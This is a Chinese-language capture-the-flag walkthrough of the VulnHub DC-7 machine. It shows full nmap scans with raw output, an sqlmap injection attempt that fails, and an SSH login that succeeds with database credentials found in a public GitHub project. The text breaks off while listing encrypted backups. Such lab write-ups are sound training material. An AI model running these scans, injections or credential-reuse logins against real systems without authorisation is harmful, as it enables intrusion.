一、靶机下载
- 靶机下载链接汇总:https://download.vulnhub.com/
- 使用搜索功能,搜索dc类型的靶机即可。
- 本次实战使用的靶机是:DC-7
- 系统:Debian
- 下载链接:https://download.vulnhub.com/dc/DC-7.zip
二、靶机启动
- 下载完成后,打开VMware软件,通过左上角文件打开,将ova文件导入,导入完成后将网络连接方式修改为NAT。
- 启动成功图
三、扫描分析
- 本次实践ip网段为:192.168.198.0/24 攻击机IP为:192.168.198.129
- 未启动靶机扫描网段
nmap -sP 192.168.198.0/24 # 结果 ┌──(root㉿kali)-[/home/varin] └─# nmap -sP 192.168.198.0/24 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-08 10:12 CST Nmap scan report for 192.168.198.1 Host is up (0.0094s latency). MAC Address: 00:50:56:C0:00:08 (VMware) Nmap scan report for 192.168.198.2 Host is up (0.00016s latency). MAC Address: 00:50:56:F7:F2:9C (VMware) Nmap scan report for 192.168.198.254 Host is up (0.00019s latency). MAC Address: 00:50:56:F0:9B:51 (VMware) Nmap scan report for 192.168.198.129 Host is up. Nmap done: 256 IP addresses (4 hosts up) scanned in 2.39 seconds
- 启动靶机扫描网段
- 得到靶机IP:192.168.198.137
nmap -sP 192.168.198.0/24 # 结果 ┌──(root㉿kali)-[/home/varin] └─# nmap -sP 192.168.198.0/24 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-08 16:06 CST Nmap scan report for 192.168.198.1 Host is up (0.00079s latency). MAC Address: 00:50:56:C0:00:08 (VMware) Nmap scan report for 192.168.198.2 Host is up (0.00021s latency). MAC Address: 00:50:56:F7:F2:9C (VMware) Nmap scan report for 192.168.198.137 Host is up (0.00034s latency). MAC Address: 00:0C:29:9D:C5:A2 (VMware) Nmap scan report for 192.168.198.254 Host is up (0.00018s latency). MAC Address: 00:50:56:F0:9B:51 (VMware) Nmap scan report for 192.168.198.129 Host is up. Nmap done: 256 IP addresses (5 hosts up) scanned in 2.70 seconds
- 对ip进行详细扫描
- 开放端口:22、80
- 开放服务:SSH、HTTP
- web框架:
nmap -A -v -p 1-65535 192.168.198.137 --script=vuln # 结果 ┌──(root㉿kali)-[/home/varin] └─# nmap -A -v -p 1-65535 192.168.198.137 --script=vuln Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-08 16:07 CST NSE: Loaded 150 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 16:07 Stats: 0:00:08 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan NSE: Active NSE Script Threads: 1 (1 waiting) NSE Timing: About 0.00% done NSE Timing: About 33.33% done; ETC: 16:09 (0:01:08 remaining) Completed NSE at 16:08, 34.06s elapsed Initiating NSE at 16:08 Completed NSE at 16:08, 0.00s elapsed Pre-scan script results: | broadcast-avahi-dos: | Discovered hosts: | 224.0.0.251 | After NULL UDP avahi packet DoS (CVE-2011-1002). |_ Hosts are all up (not vulnerable). Initiating ARP Ping Scan at 16:08 Scanning 192.168.198.137 [1 port] Completed ARP Ping Scan at 16:08, 0.05s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 16:08 Completed Parallel DNS resolution of 1 host. at 16:08, 0.01s elapsed Initiating SYN Stealth Scan at 16:08 Scanning 192.168.198.137 [65535 ports] Discovered open port 80/tcp on 192.168.198.137 Discovered open port 22/tcp on 192.168.198.137 Completed SYN Stealth Scan at 16:08, 5.45s elapsed (65535 total ports) Initiating Service scan at 16:08 Scanning 2 services on 192.168.198.137 Completed Service scan at 16:08, 24.76s elapsed (2 services on 1 host) Initiating OS detection (try #1) against 192.168.198.137 NSE: Script scanning 192.168.198.137. Initiating NSE at 16:08 Completed NSE at 16:10, 114.87s elapsed Initiating NSE at 16:10 Completed NSE at 16:10, 0.04s elapsed Nmap scan report for 192.168.198.137 Host is up (0.0033s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) 80/tcp open http Apache httpd 2.4.25 ((Debian)) |_http-dombased-xss: Couldn't find any DOM based XSS. | http-csrf: | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.198.137 | Found the following possible CSRF vulnerabilities: | | Path: http://192.168.198.137:80/ | Form id: search-block-form | Form action: /search/node | | Path: http://192.168.198.137:80/search/node | Form id: search-form | Form action: /search/node | | Path: http://192.168.198.137:80/search/node | Form id: search-block-form | Form action: /search/node | | Path: http://192.168.198.137:80/node/1 | Form id: search-block-form | Form action: /search/node | | Path: http://192.168.198.137:80/user/login | Form id: user-login-form | Form action: /user/login | | Path: http://192.168.198.137:80/user/login | Form id: search-block-form | Form action: /search/node | | Path: http://192.168.198.137:80/search/node | Form id: search-form | Form action: /search/node | | Path: http://192.168.198.137:80/search/node | Form id: search-block-form | Form action: /search/node | | Path: http://192.168.198.137:80/search/node/help | Form id: search-block-form | Form action: /search/node | | Path: http://192.168.198.137:80/search/node | Form id: search-form | Form action: /search/node | | Path: http://192.168.198.137:80/search/node | Form id: search-block-form | Form action: /search/node | | Path: http://192.168.198.137:80/node/ | Form id: search-block-form | Form action: /search/node | | Path: http://192.168.198.137:80/user/login | Form id: user-login-form | Form action: /user/login | | Path: http://192.168.198.137:80/user/login | Form id: search-block-form | Form action: /search/node | | Path: http://192.168.198.137:80/user/password | Form id: user-pass | Form action: /user/password | | Path: http://192.168.198.137:80/user/password | Form id: search-block-form | Form action: /search/node | | Path: http://192.168.198.137:80/search/node/ | Form id: search-form | Form action: /search/node/ | | Path: http://192.168.198.137:80/search/node/ | Form id: search-block-form |_ Form action: /search/node |_http-server-header: Apache/2.4.25 (Debian) |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. | http-enum: | /rss.xml: RSS or Atom feed | /robots.txt: Robots file | /INSTALL.txt: Drupal file | /: Drupal version 8 |_ /README.txt: Interesting, a readme. MAC Address: 00:0C:29:9D:C5:A2 (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Uptime guess: 0.304 days (since Thu Aug 8 08:53:28 2024) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=261 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 3.33 ms 192.168.198.137 NSE: Script Post-scanning. Initiating NSE at 16:10 Completed NSE at 16:10, 0.00s elapsed Initiating NSE at 16:10 Completed NSE at 16:10, 0.00s elapsed Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 186.00 seconds Raw packets sent: 65558 (2.885MB) | Rcvd: 65550 (2.623MB)
四、网站首页
五、SQLMAP
# 首页有搜索框尝试sqlmap注入 sqlmap -u http://192.168.198.137/search/node?keys=ff --dbs # 结果:注入失败
六、@DC7USER
# 因为注入不了,网页也没有什么东西,观察有一个@DC7 USER # 尝试使用google搜索 # 发现github项目有叫这个名称的
# 点击后发现是PHP项目 # 查看项目配置文件 # 数据库用户名:dc7user # 数据库密码:MdR3xOgB7#dW # 数据库名称:Staff <?php $servername = "localhost"; $username = "dc7user"; $password = "MdR3xOgB7#dW"; $dbname = "Staff"; $conn = mysqli_connect($servername, $username, $password, $dbname); ?>
七、MYSQL登录尝试
# 数据库用户名:dc7user # 数据库密码:MdR3xOgB7#dW # 结果:登录失败
八、SSH登录尝试
# 因为在信息扫描时,发现存在ssh服务,mysql登录不上,尝试ssh登录 # ip:192.168.198.137 # 用户名:dc7user # 密码:MdR3xOgB7#dW # 结果:登录成功
# 登录后信息收集 # 一个文件一个文件夹 mbox文件 backups文件夹 # 文件夹中有两个文件: website.sql.gpg website.tar.gz.gpg # gpg文件:
